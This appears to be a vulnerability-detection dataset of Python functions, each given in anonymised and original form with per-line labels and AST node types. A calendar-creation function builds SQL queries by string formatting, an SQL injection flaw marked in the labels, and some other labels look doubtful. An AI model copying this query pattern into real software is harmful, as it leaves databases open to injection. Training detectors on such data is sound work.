[ "def FUNC_14(self):...\n", "\"\"\"docstring\"\"\"\n", "self.check_protected_output()\n", "VAR_20 = self.dag.reason(self).missing_output.intersection(self.existing_output\n )\n", "if VAR_20:\n", "logger.warning(\n \"\"\"Warning: the following output files of rule {} were not present when the DAG was created:\n{}\"\"\"\n .format(self.rule, VAR_20))\n", "if self.dynamic_output:\n", "for VAR_28, _ in chain(*map(partial(self.expand_dynamic, VAR_13=self.\n", "for VAR_28, VAR_27 in zip(self.output, self.rule.output):\n", "os.remove(VAR_28)\n", "VAR_28.prepare()\n", "for VAR_28 in self.log:\n", "VAR_28.prepare()\n", "if self.benchmark:\n", "self.benchmark.prepare()\n" ]
[ "def prepare(self):...\n", "\"\"\"docstring\"\"\"\n", "self.check_protected_output()\n", "unexpected_output = self.dag.reason(self).missing_output.intersection(self.\n existing_output)\n", "if unexpected_output:\n", "logger.warning(\n \"\"\"Warning: the following output files of rule {} were not present when the DAG was created:\n{}\"\"\"\n .format(self.rule, unexpected_output))\n", "if self.dynamic_output:\n", "for f, _ in chain(*map(partial(self.expand_dynamic, restriction=self.\n", "for f, f_ in zip(self.output, self.rule.output):\n", "os.remove(f)\n", "f.prepare()\n", "for f in self.log:\n", "f.prepare()\n", "if self.benchmark:\n", "self.benchmark.prepare()\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Docstring", "Expr'", "Assign'", "Condition", "Expr'", "Condition", "For", "For", "Expr'", "Expr'", "For", "Expr'", "Condition", "Expr'" ]
[ "@classmethod...\n", "super(CLASS_4, VAR_0).setUpTestData()\n", "VAR_0.permission = 'testruns.change_testcaserun'\n", "VAR_0.update_url = reverse('ajax-update_case_run_status')\n" ]
[ "@classmethod...\n", "super(TestUpdateCaseRunStatus, cls).setUpTestData()\n", "cls.permission = 'testruns.change_testcaserun'\n", "cls.update_url = reverse('ajax-update_case_run_status')\n" ]
[ 0, 0, 0, 0 ]
[ "Condition", "Expr'", "Assign'", "Assign'" ]
[ "def FUNC_9(self):...\n", "FUNC_1('MISC FILE CHECKS')\n", "VAR_22 = ('manifest.json', 'LICENSE', 'README.md', 'scripts/install',\n 'scripts/remove', 'scripts/upgrade', 'scripts/backup', 'scripts/restore')\n", "VAR_23 = 'script/backup', 'script/restore'\n", "for filename in VAR_22:\n", "if FUNC_6(self.path + '/' + filename):\n", "if FUNC_6(self.path + '/conf/php-fpm.ini'):\n", "if filename in VAR_23:\n", "FUNC_3('string')\n", "for filename in os.listdir(self.path + '/conf'):\n", "FUNC_3('Consider adding a file %s' % filename)\n", "FUNC_4('File %s is mandatory' % filename)\n", "if not os.path.isfile(self.path + '/conf/' + filename):\n", "VAR_32 = open(self.path + '/conf/' + filename).read()\n", "if 'location' in VAR_32 and 'add_header' in VAR_32:\n", "FUNC_3('string')\n" ]
[ "def misc_file_checks(self):...\n", "print_header('MISC FILE CHECKS')\n", "filenames = ('manifest.json', 'LICENSE', 'README.md', 'scripts/install',\n 'scripts/remove', 'scripts/upgrade', 'scripts/backup', 'scripts/restore')\n", "non_mandatory = 'script/backup', 'script/restore'\n", "for filename in filenames:\n", "if file_exists(self.path + '/' + filename):\n", "if file_exists(self.path + '/conf/php-fpm.ini'):\n", "if filename in non_mandatory:\n", "print_warning(\n 'Using a separate php-fpm.ini file is deprecated. Please merge your php-fpm directives directly in the pool file. (c.f. https://github.com/YunoHost-Apps/nextcloud_ynh/issues/138 )'\n )\n", "for filename in os.listdir(self.path + '/conf'):\n", "print_warning('Consider adding a file %s' % filename)\n", "print_error('File %s is mandatory' % filename)\n", "if not os.path.isfile(self.path + '/conf/' + filename):\n", "content = open(self.path + '/conf/' + filename).read()\n", "if 'location' in content and 'add_header' in content:\n", "print_warning(\n \"Do not use 'add_header' in the nginx conf. Use 'more_set_headers' instead. (See https://www.peterbe.com/plog/be-very-careful-with-your-add_header-in-nginx and https://github.com/openresty/headers-more-nginx-module#more_set_headers )\"\n )\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0 ]
[ "FunctionDef'", "Expr'", "Assign'", "Assign'", "For", "Condition", "Condition", "Condition", "Expr'", "For", "Expr'", "Expr'", "Condition", "Assign'", "Condition", "Expr'" ]
[ "def FUNC_3(self):...\n", "VAR_1 = self.client.get(f'/qa/extractionscript/')\n", "self.assertIn(f\"/qa/extractionscript/15/'> Begin QA\".encode(), VAR_1.content)\n", "VAR_2 = 9\n", "VAR_1 = self.client.get(f'/qa/extractionscript/{VAR_2}/', follow=True)\n", "self.assertEqual(VAR_1.status_code, 200)\n" ]
[ "def test_qa_script_without_ext_text(self):...\n", "response = self.client.get(f'/qa/extractionscript/')\n", "self.assertIn(f\"/qa/extractionscript/15/'> Begin QA\".encode(), response.content\n )\n", "pk = 9\n", "response = self.client.get(f'/qa/extractionscript/{pk}/', follow=True)\n", "self.assertEqual(response.status_code, 200)\n" ]
[ 0, 0, 0, 0, 0, 6 ]
[ "FunctionDef'", "Assign'", "Expr'", "Assign'", "Assign'", "Expr'" ]
[ "def FUNC_1(self):...\n", "self.render('signin.html', VAR_6='')\n" ]
[ "def get(self):...\n", "self.render('signin.html', error='')\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Expr'" ]
[ "def FUNC_6(self):...\n", "if not VAR_101.user_is_admin:\n", "abort(404, 'page not found')\n" ]
[ "def run(self):...\n", "if not c.user_is_admin:\n", "abort(404, 'page not found')\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "Condition", "Expr'" ]
[ "def FUNC_8(self):...\n", "url_helper.urllib2.urlopen(mox.IgnoreArg(), mox.IgnoreArg(), timeout=mox.\n IgnoreArg()).AndRaise(urllib2.URLError('url'))\n", "self._mox.ReplayAll()\n", "self.assertIsNone(url_helper.UrlOpen('url', max_tries=1))\n", "self._mox.VerifyAll()\n" ]
[ "def testUrlOpenFailure(self):...\n", "url_helper.urllib2.urlopen(mox.IgnoreArg(), mox.IgnoreArg(), timeout=mox.\n IgnoreArg()).AndRaise(urllib2.URLError('url'))\n", "self._mox.ReplayAll()\n", "self.assertIsNone(url_helper.UrlOpen('url', max_tries=1))\n", "self._mox.VerifyAll()\n" ]
[ 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Expr'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_0(VAR_0):...\n", "return ''.join([(text.zfill(5) if text.isdigit() else text.lower()) for\n text in split('([0-9]+)', str(VAR_0))])\n" ]
[ "def fix_sort(string):...\n", "return ''.join([(text.zfill(5) if text.isdigit() else text.lower()) for\n text in split('([0-9]+)', str(string))])\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def FUNC_1():...\n", "VAR_1 = [{'fieldname': 'territory', 'fieldtype': 'Link', 'label': _(\n 'Territory'), 'options': 'Territory', 'width': 100}, {'fieldname':\n 'item_group', 'fieldtype': 'Link', 'label': _('Item Group'), 'options':\n 'Item Group', 'width': 150}, {'fieldname': 'item_name', 'fieldtype':\n 'Link', 'options': 'Item', 'label': 'Item', 'width': 150}, {'fieldname':\n 'item_name', 'fieldtype': 'Data', 'label': _('Item Name'), 'width': 150\n }, {'fieldname': 'customer', 'fieldtype': 'Link', 'label': _('Customer'\n ), 'options': 'Customer', 'width': 100}, {'fieldname':\n 'last_order_date', 'fieldtype': 'Date', 'label': _('Last Order Date'),\n 'width': 100}, {'fieldname': 'qty', 'fieldtype': 'Float', 'label': _(\n 'Quantity'), 'width': 100}, {'fieldname': 'days_since_last_order',\n 'fieldtype': 'Int', 'label': _('Days Since Last Order'), 'width': 100}]\n", "return VAR_1\n" ]
[ "def get_columns():...\n", "columns = [{'fieldname': 'territory', 'fieldtype': 'Link', 'label': _(\n 'Territory'), 'options': 'Territory', 'width': 100}, {'fieldname':\n 'item_group', 'fieldtype': 'Link', 'label': _('Item Group'), 'options':\n 'Item Group', 'width': 150}, {'fieldname': 'item_name', 'fieldtype':\n 'Link', 'options': 'Item', 'label': 'Item', 'width': 150}, {'fieldname':\n 'item_name', 'fieldtype': 'Data', 'label': _('Item Name'), 'width': 150\n }, {'fieldname': 'customer', 'fieldtype': 'Link', 'label': _('Customer'\n ), 'options': 'Customer', 'width': 100}, {'fieldname':\n 'last_order_date', 'fieldtype': 'Date', 'label': _('Last Order Date'),\n 'width': 100}, {'fieldname': 'qty', 'fieldtype': 'Float', 'label': _(\n 'Quantity'), 'width': 100}, {'fieldname': 'days_since_last_order',\n 'fieldtype': 'Int', 'label': _('Days Since Last Order'), 'width': 100}]\n", "return columns\n" ]
[ 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Return'" ]
[ "def FUNC_1(self):...\n", "VAR_2 = DummyRequest([''])\n", "VAR_3 = self.web.get(VAR_2)\n", "def FUNC_2(VAR_4):...\n", "VAR_5 = '<title>{0}</title>'.format(self.MAIL_ADDRESS)\n", "VAR_6 = re.findall(VAR_5, VAR_2.written[0])\n", "self.assertEquals(len(VAR_6), 1)\n", "VAR_3.addCallback(FUNC_2)\n", "return VAR_3\n" ]
[ "def test_render_GET_should_template_account_email(self):...\n", "request = DummyRequest([''])\n", "d = self.web.get(request)\n", "def assert_response(_):...\n", "expected = '<title>{0}</title>'.format(self.MAIL_ADDRESS)\n", "matches = re.findall(expected, request.written[0])\n", "self.assertEquals(len(matches), 1)\n", "d.addCallback(assert_response)\n", "return d\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "FunctionDef'", "Assign'", "Assign'", "Expr'", "Expr'", "Return'" ]
[ "\"\"\"string\"\"\"\n", "import cgi\n", "import json\n", "import src.models.mysql as mysql\n", "def FUNC_0(VAR_0):...\n", "\"\"\"docstring\"\"\"\n", "VAR_2 = VAR_0.copy()\n", "VAR_2['QUERY_STRING'] = ''\n", "VAR_3 = cgi.FieldStorage(fp=environ['wsgi.input'], VAR_0=data_env,\n keep_blank_values=True)\n", "return VAR_3\n" ]
[ "\"\"\" Api Controller\n\n Arquivo onde se encontra toda a lógica que rodará na rota '/api'\n\nTodo:\n\n None\n\n\"\"\"\n", "import cgi\n", "import json\n", "import src.models.mysql as mysql\n", "def getFields(environ):...\n", "\"\"\"docstring\"\"\"\n", "data_env = environ.copy()\n", "data_env['QUERY_STRING'] = ''\n", "data = cgi.FieldStorage(fp=environ['wsgi.input'], environ=data_env,\n keep_blank_values=True)\n", "return data\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Expr'", "Import'", "Import'", "Import'", "FunctionDef'", "Docstring", "Assign'", "Assign'", "Assign'", "Return'" ]
[ "def FUNC_0(VAR_0, VAR_1, VAR_2, VAR_3):...\n", "VAR_8 = VAR_3.connect()\n", "VAR_9 = VAR_8.cursor()\n", "VAR_10 = \"SELECT userId FROM Users WHERE userEmail = '{0}'\".format(VAR_2)\n", "VAR_9.execute(VAR_10)\n", "VAR_11 = VAR_9.fetchone()\n", "if VAR_11 is None:\n", "return False, None\n", "VAR_5 = str(uuid.uuid4())\n", "if VAR_1 == '':\n", "VAR_1 = '2000-01-01'\n", "VAR_14 = (\n \"INSERT INTO Calendars (calendarId, name, day, userId) VALUES('{0}','{1}', '{2}', {3})\"\n .format(VAR_5, VAR_0, VAR_1, VAR_11[0]))\n", "VAR_9.execute(VAR_14)\n", "VAR_8.commit()\n", "VAR_14 = 'string'.format(VAR_11[0], VAR_5)\n", "VAR_9.execute(VAR_14)\n", "VAR_8.commit()\n", "return True, VAR_5\n" ]
[ "def createCalendar(calendarName, day, username, sqlHandle):...\n", "conn = sqlHandle.connect()\n", "cursor = conn.cursor()\n", "userCheckQuery = \"SELECT userId FROM Users WHERE userEmail = '{0}'\".format(\n username)\n", "cursor.execute(userCheckQuery)\n", "userResult = cursor.fetchone()\n", "if userResult is None:\n", "return False, None\n", "calendarId = str(uuid.uuid4())\n", "if day == '':\n", "day = '2000-01-01'\n", "queryString = (\n \"INSERT INTO Calendars (calendarId, name, day, userId) VALUES('{0}','{1}', '{2}', {3})\"\n .format(calendarId, calendarName, day, userResult[0]))\n", "cursor.execute(queryString)\n", "conn.commit()\n", "queryString = (\n \"\"\"INSERT INTO TimeSlots (userId, calendarId, zero, one, two, three, four, five, six, seven, eight, nine,\n ten, eleven, twelve, thirteen, fourteen, fifteen, sixteen, seventeen, eighteen, nineteen, twenty, twentyone,\n twentytwo, twentythree) VALUES({0},'{1}','','','','','','','','','','','','','','','','','','','','','','',\n '','')\"\"\"\n .format(userResult[0], calendarId))\n", "cursor.execute(queryString)\n", "conn.commit()\n", "return True, calendarId\n" ]
[ 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 4, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Assign'", "Expr'", "Assign'", "Condition", "Return'", "Assign'", "Condition", "Assign'", "Assign'", "Expr'", "Expr'", "Assign'", "Expr'", "Expr'", "Return'" ]
[ "\"\"\"\nNotifier.\n\nAuthor(s): Jelle Roozenburg\n\"\"\"\n", "import logging\n", "import threading\n", "from Tribler.Core.simpledefs import NTFY_TORRENTS, NTFY_PLAYLISTS, NTFY_COMMENTS, NTFY_MODIFICATIONS, NTFY_MODERATIONS, NTFY_MARKINGS, NTFY_MYPREFERENCES, NTFY_ACTIVITIES, NTFY_REACHABLE, NTFY_CHANNELCAST, NTFY_VOTECAST, NTFY_DISPERSY, NTFY_TRACKERINFO, NTFY_UPDATE, NTFY_INSERT, NTFY_DELETE, NTFY_TUNNEL, NTFY_STARTUP_TICK, NTFY_CLOSE_TICK, NTFY_UPGRADER, SIGNAL_ALLCHANNEL_COMMUNITY, SIGNAL_SEARCH_COMMUNITY, SIGNAL_TORRENT, SIGNAL_CHANNEL, SIGNAL_CHANNEL_COMMUNITY, SIGNAL_RSS_FEED, NTFY_WATCH_FOLDER_CORRUPT_TORRENT, NTFY_NEW_VERSION, NTFY_TRIBLER, NTFY_UPGRADER_TICK, NTFY_TORRENT, NTFY_CHANNEL, NTFY_MARKET_ON_ASK, NTFY_MARKET_ON_BID, NTFY_MARKET_ON_TRANSACTION_COMPLETE, NTFY_MARKET_ON_ASK_TIMEOUT, NTFY_MARKET_ON_BID_TIMEOUT, NTFY_MARKET_IOM_INPUT_REQUIRED, NTFY_MARKET_ON_PAYMENT_RECEIVED, NTFY_MARKET_ON_PAYMENT_SENT, SIGNAL_RESOURCE_CHECK, NTFY_CREDIT_MINING, STATE_SHUTDOWN\n", "VAR_0 = [NTFY_TORRENTS, NTFY_PLAYLISTS, NTFY_COMMENTS, NTFY_MODIFICATIONS,\n NTFY_MODERATIONS, NTFY_MARKINGS, NTFY_MYPREFERENCES, NTFY_ACTIVITIES,\n NTFY_REACHABLE, NTFY_CHANNELCAST, NTFY_CLOSE_TICK, NTFY_DISPERSY,\n NTFY_STARTUP_TICK, NTFY_TRACKERINFO, NTFY_TUNNEL, NTFY_UPGRADER,\n NTFY_VOTECAST, SIGNAL_ALLCHANNEL_COMMUNITY, SIGNAL_CHANNEL,\n SIGNAL_CHANNEL_COMMUNITY, SIGNAL_RSS_FEED, SIGNAL_SEARCH_COMMUNITY,\n SIGNAL_TORRENT, NTFY_WATCH_FOLDER_CORRUPT_TORRENT, NTFY_NEW_VERSION,\n NTFY_TRIBLER, NTFY_UPGRADER_TICK, NTFY_TORRENT, NTFY_CHANNEL,\n NTFY_MARKET_ON_ASK, NTFY_MARKET_ON_BID, NTFY_MARKET_ON_ASK_TIMEOUT,\n NTFY_MARKET_ON_BID_TIMEOUT, NTFY_MARKET_ON_TRANSACTION_COMPLETE,\n NTFY_MARKET_ON_PAYMENT_RECEIVED, NTFY_MARKET_ON_PAYMENT_SENT,\n NTFY_MARKET_IOM_INPUT_REQUIRED, SIGNAL_RESOURCE_CHECK,\n NTFY_CREDIT_MINING, STATE_SHUTDOWN]\n", "def __init__(self):...\n", "self._logger = logging.getLogger(self.__class__.__name__)\n", "self.observers = []\n", "self.observerscache = {}\n", "self.observertimers = {}\n", "self.observerLock = threading.Lock()\n", "def FUNC_0(self, VAR_1, VAR_2, VAR_3=None, VAR_4=None, VAR_5=0):...\n", "VAR_3 = VAR_3 or [NTFY_UPDATE, NTFY_INSERT, NTFY_DELETE]\n", "\"\"\"string\"\"\"\n", "assert isinstance(VAR_3, list)\n", "assert VAR_2 in self.SUBJECTS, 'Subject %s not in SUBJECTS' % VAR_2\n", "VAR_9 = VAR_1, VAR_2, VAR_3, VAR_4, VAR_5\n", "self.observerLock.acquire()\n", "self.observers.append(VAR_9)\n", "self.observerLock.release()\n", "def FUNC_1(self, VAR_1):...\n", "\"\"\"docstring\"\"\"\n", "VAR_11 = 0\n", "while VAR_11 < len(self.observers):\n", "VAR_12 = self.observers[VAR_11][0]\n", "def FUNC_2(self):...\n", "if VAR_12 == VAR_1:\n", "for timer in self.observertimers.values():\n", "VAR_11 += 1\n", "timer.cancel()\n", "self.observerscache = {}\n", "self.observertimers = {}\n", "self.observers = []\n", "def FUNC_3(self, VAR_2, VAR_6, VAR_7, *VAR_8):...\n", "\"\"\"docstring\"\"\"\n", "VAR_10 = []\n", "assert VAR_2 in self.SUBJECTS, 'Subject %s not in SUBJECTS' % VAR_2\n", "VAR_8 = [VAR_2, VAR_6, VAR_7] + list(VAR_8)\n", "self.observerLock.acquire()\n", "for VAR_12, osubject, ochangeTypes, oid, VAR_5 in self.observers:\n", "self.observerLock.release()\n", "if VAR_2 == osubject and VAR_6 in ochangeTypes and (oid is None or oid == VAR_7\n", "self._logger.exception('OIDs were %s %s', repr(oid), repr(VAR_7))\n", "for task in VAR_10:\n", "if not VAR_5:\n", "task(*VAR_8)\n", "VAR_10.append(VAR_12)\n", "if VAR_12 not in self.observerscache:\n", "def FUNC_4(VAR_12):...\n", "self.observerscache[VAR_12].append(VAR_8)\n", "self.observerLock.acquire()\n", "if VAR_12 in self.observerscache:\n", "VAR_14 = self.observerscache[VAR_12]\n", "VAR_14 = []\n", "self.observerLock.release()\n", "if VAR_14:\n", "VAR_12(VAR_14)\n", "VAR_13 = threading.Timer(VAR_5, FUNC_4, (VAR_12,))\n", "VAR_13.setName('Notifier-timer-%s' % VAR_2)\n", "VAR_13.start()\n", "self.observerscache[VAR_12] = []\n", "self.observertimers[VAR_12] = VAR_13\n" ]
[ "\"\"\"\nNotifier.\n\nAuthor(s): Jelle Roozenburg\n\"\"\"\n", "import logging\n", "import threading\n", "from Tribler.Core.simpledefs import NTFY_TORRENTS, NTFY_PLAYLISTS, NTFY_COMMENTS, NTFY_MODIFICATIONS, NTFY_MODERATIONS, NTFY_MARKINGS, NTFY_MYPREFERENCES, NTFY_ACTIVITIES, NTFY_REACHABLE, NTFY_CHANNELCAST, NTFY_VOTECAST, NTFY_DISPERSY, NTFY_TRACKERINFO, NTFY_UPDATE, NTFY_INSERT, NTFY_DELETE, NTFY_TUNNEL, NTFY_STARTUP_TICK, NTFY_CLOSE_TICK, NTFY_UPGRADER, SIGNAL_ALLCHANNEL_COMMUNITY, SIGNAL_SEARCH_COMMUNITY, SIGNAL_TORRENT, SIGNAL_CHANNEL, SIGNAL_CHANNEL_COMMUNITY, SIGNAL_RSS_FEED, NTFY_WATCH_FOLDER_CORRUPT_TORRENT, NTFY_NEW_VERSION, NTFY_TRIBLER, NTFY_UPGRADER_TICK, NTFY_TORRENT, NTFY_CHANNEL, NTFY_MARKET_ON_ASK, NTFY_MARKET_ON_BID, NTFY_MARKET_ON_TRANSACTION_COMPLETE, NTFY_MARKET_ON_ASK_TIMEOUT, NTFY_MARKET_ON_BID_TIMEOUT, NTFY_MARKET_IOM_INPUT_REQUIRED, NTFY_MARKET_ON_PAYMENT_RECEIVED, NTFY_MARKET_ON_PAYMENT_SENT, SIGNAL_RESOURCE_CHECK, NTFY_CREDIT_MINING, STATE_SHUTDOWN\n", "SUBJECTS = [NTFY_TORRENTS, NTFY_PLAYLISTS, NTFY_COMMENTS,\n NTFY_MODIFICATIONS, NTFY_MODERATIONS, NTFY_MARKINGS, NTFY_MYPREFERENCES,\n NTFY_ACTIVITIES, NTFY_REACHABLE, NTFY_CHANNELCAST, NTFY_CLOSE_TICK,\n NTFY_DISPERSY, NTFY_STARTUP_TICK, NTFY_TRACKERINFO, NTFY_TUNNEL,\n NTFY_UPGRADER, NTFY_VOTECAST, SIGNAL_ALLCHANNEL_COMMUNITY,\n SIGNAL_CHANNEL, SIGNAL_CHANNEL_COMMUNITY, SIGNAL_RSS_FEED,\n SIGNAL_SEARCH_COMMUNITY, SIGNAL_TORRENT,\n NTFY_WATCH_FOLDER_CORRUPT_TORRENT, NTFY_NEW_VERSION, NTFY_TRIBLER,\n NTFY_UPGRADER_TICK, NTFY_TORRENT, NTFY_CHANNEL, NTFY_MARKET_ON_ASK,\n NTFY_MARKET_ON_BID, NTFY_MARKET_ON_ASK_TIMEOUT,\n NTFY_MARKET_ON_BID_TIMEOUT, NTFY_MARKET_ON_TRANSACTION_COMPLETE,\n NTFY_MARKET_ON_PAYMENT_RECEIVED, NTFY_MARKET_ON_PAYMENT_SENT,\n NTFY_MARKET_IOM_INPUT_REQUIRED, SIGNAL_RESOURCE_CHECK,\n NTFY_CREDIT_MINING, STATE_SHUTDOWN]\n", "def __init__(self):...\n", "self._logger = logging.getLogger(self.__class__.__name__)\n", "self.observers = []\n", "self.observerscache = {}\n", "self.observertimers = {}\n", "self.observerLock = threading.Lock()\n", "def add_observer(self, func, subject, changeTypes=None, id=None, cache=0):...\n", "changeTypes = changeTypes or [NTFY_UPDATE, NTFY_INSERT, NTFY_DELETE]\n", "\"\"\"\n Add observer function which will be called upon certain event\n Example:\n addObserver(NTFY_TORRENTS, [NTFY_INSERT,NTFY_DELETE]) -> get callbacks\n when peers are added or deleted\n addObserver(NTFY_TORRENTS, [NTFY_SEARCH_RESULT], 'a_search_id') -> get\n callbacks when peer-searchresults of of search\n with id=='a_search_id' come in\n \"\"\"\n", "assert isinstance(changeTypes, list)\n", "assert subject in self.SUBJECTS, 'Subject %s not in SUBJECTS' % subject\n", "obs = func, subject, changeTypes, id, cache\n", "self.observerLock.acquire()\n", "self.observers.append(obs)\n", "self.observerLock.release()\n", "def remove_observer(self, func):...\n", "\"\"\"docstring\"\"\"\n", "i = 0\n", "while i < len(self.observers):\n", "ofunc = self.observers[i][0]\n", "def remove_observers(self):...\n", "if ofunc == func:\n", "for timer in self.observertimers.values():\n", "i += 1\n", "timer.cancel()\n", "self.observerscache = {}\n", "self.observertimers = {}\n", "self.observers = []\n", "def notify(self, subject, changeType, obj_id, *args):...\n", "\"\"\"docstring\"\"\"\n", "tasks = []\n", "assert subject in self.SUBJECTS, 'Subject %s not in SUBJECTS' % subject\n", "args = [subject, changeType, obj_id] + list(args)\n", "self.observerLock.acquire()\n", "for ofunc, osubject, ochangeTypes, oid, cache in self.observers:\n", "self.observerLock.release()\n", "if subject == osubject and changeType in ochangeTypes and (oid is None or \n", "self._logger.exception('OIDs were %s %s', repr(oid), repr(obj_id))\n", "for task in tasks:\n", "if not cache:\n", "task(*args)\n", "tasks.append(ofunc)\n", "if ofunc not in self.observerscache:\n", "def doQueue(ofunc):...\n", "self.observerscache[ofunc].append(args)\n", "self.observerLock.acquire()\n", "if ofunc in self.observerscache:\n", "events = self.observerscache[ofunc]\n", "events = []\n", "self.observerLock.release()\n", "if events:\n", "ofunc(events)\n", "t = threading.Timer(cache, doQueue, (ofunc,))\n", "t.setName('Notifier-timer-%s' % subject)\n", "t.start()\n", "self.observerscache[ofunc] = []\n", "self.observertimers[ofunc] = t\n" ]
[ 0, 0, 0, 4, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "Expr'", "Import'", "Import'", "ImportFrom'", "Assign'", "FunctionDef'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "FunctionDef'", "Assign'", "Expr'", "Assert'", "Assert'", "Assign'", "Expr'", "Expr'", "Expr'", "FunctionDef'", "Docstring", "Assign'", "Condition", "Assign'", "FunctionDef'", "Condition", "For", "AugAssign'", "Expr'", "Assign'", "Assign'", "Assign'", "FunctionDef'", "Docstring", "Assign'", "Assert'", "Assign'", "Expr'", "For", "Expr'", "Condition", "Expr'", "For", "Condition", "Expr'", "Expr'", "Condition", "FunctionDef'", "Expr'", "Expr'", "Condition", "Assign'", "Assign'", "Expr'", "Condition", "Expr'", "Assign'", "Expr'", "Expr'", "Assign'", "Assign'" ]
[ "@property...\n", "return self._attributes['state']\n" ]
[ "@property...\n", "return self._attributes['state']\n" ]
[ 0, 0 ]
[ "Condition", "Return'" ]
[ "def FUNC_6(self, VAR_3):...\n", "return VAR_3\n" ]
[ "def run(self, x):...\n", "return x\n" ]
[ 0, 0 ]
[ "FunctionDef'", "Return'" ]
[ "def __init__(self, VAR_0, VAR_1=None):...\n", "self.exercise = VAR_0\n", "self.max_points = getattr(VAR_0, 'max_points', 0)\n", "self.difficulty = getattr(VAR_0, 'difficulty', '')\n", "self.points_to_pass = getattr(VAR_0, 'points_to_pass', 0)\n", "self.user = VAR_1\n", "self.submissions = []\n", "self.submission_count = 0\n", "self.best_submission = None\n", "self.graded = False\n", "self.unofficial = False\n", "if self.user and self.user.is_authenticated():\n", "self.submissions = list(VAR_0.get_submissions_for_student(VAR_1.userprofile))\n", "for VAR_10 in self.submissions:\n", "if not VAR_10.status in (Submission.STATUS.ERROR, Submission.STATUS.REJECTED):\n", "self.submission_count += 1\n", "if VAR_10.status == Submission.STATUS.READY and (self.best_submission is\n", "self.best_submission = VAR_10\n", "if VAR_10.status == Submission.STATUS.UNOFFICIAL and (not self.graded or \n", "self.unofficial = False\n", "self.best_submission = VAR_10\n", "self.graded = True\n", "self.unofficial = True\n" ]
[ "def __init__(self, exercise, user=None):...\n", "self.exercise = exercise\n", "self.max_points = getattr(exercise, 'max_points', 0)\n", "self.difficulty = getattr(exercise, 'difficulty', '')\n", "self.points_to_pass = getattr(exercise, 'points_to_pass', 0)\n", "self.user = user\n", "self.submissions = []\n", "self.submission_count = 0\n", "self.best_submission = None\n", "self.graded = False\n", "self.unofficial = False\n", "if self.user and self.user.is_authenticated():\n", "self.submissions = list(exercise.get_submissions_for_student(user.userprofile))\n", "for s in self.submissions:\n", "if not s.status in (Submission.STATUS.ERROR, Submission.STATUS.REJECTED):\n", "self.submission_count += 1\n", "if s.status == Submission.STATUS.READY and (self.best_submission is None or\n", "self.best_submission = s\n", "if s.status == Submission.STATUS.UNOFFICIAL and (not self.graded or self.\n", "self.unofficial = False\n", "self.best_submission = s\n", "self.graded = True\n", "self.unofficial = True\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 4, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Assign'", "Condition", "Assign'", "For", "Condition", "AugAssign'", "Condition", "Assign'", "Condition", "Assign'", "Assign'", "Assign'", "Assign'" ]
[ "def FUNC_13(self):...\n", "VAR_7.environ['SWARMING_LOAD_TEST'] = '1'\n", "VAR_18 = threading.Event()\n", "self.mock(VAR_18, 'wait', self.fail)\n", "self.mock(bot_main, 'run_manifest', self.fail)\n", "self.mock(bot_main, 'update_bot', self.fail)\n", "self.mock(self.bot, 'restart', self.fail)\n", "self.expected_requests([(\n 'https://localhost:1/auth/api/v1/accounts/self/xsrf_token', {'data': {},\n 'headers': {'X-XSRF-Token-Request': '1'}}, {'xsrf_token': 'token'}), (\n 'https://localhost:1/swarming/api/v1/bot/poll', {'data': self.\n attributes, 'headers': {'X-XSRF-Token': 'token'}}, {'cmd': 'restart',\n 'message': 'Please die now'})])\n", "self.assertTrue(bot_main.poll_server(self.bot, VAR_18))\n" ]
[ "def test_poll_server_restart_load_test(self):...\n", "os.environ['SWARMING_LOAD_TEST'] = '1'\n", "bit = threading.Event()\n", "self.mock(bit, 'wait', self.fail)\n", "self.mock(bot_main, 'run_manifest', self.fail)\n", "self.mock(bot_main, 'update_bot', self.fail)\n", "self.mock(self.bot, 'restart', self.fail)\n", "self.expected_requests([(\n 'https://localhost:1/auth/api/v1/accounts/self/xsrf_token', {'data': {},\n 'headers': {'X-XSRF-Token-Request': '1'}}, {'xsrf_token': 'token'}), (\n 'https://localhost:1/swarming/api/v1/bot/poll', {'data': self.\n attributes, 'headers': {'X-XSRF-Token': 'token'}}, {'cmd': 'restart',\n 'message': 'Please die now'})])\n", "self.assertTrue(bot_main.poll_server(self.bot, bit))\n" ]
[ 0, 0, 0, 0, 0, 0, 0, 0, 0 ]
[ "FunctionDef'", "Assign'", "Assign'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'", "Expr'" ]
[ "def FUNC_2(self):...\n", "super(CLASS_1, self).setUp()\n", "api.reset_local_state()\n", "self.logged_errors = []\n", "self.mock(handler.logging, 'error', lambda *args, **kwargs: self.\n logged_errors.append((args, kwargs)))\n", "self.logged_warnings = []\n", "self.mock(handler.logging, 'warning', lambda *args, **kwargs: self.\n logged_warnings.append((args, kwargs)))\n" ]
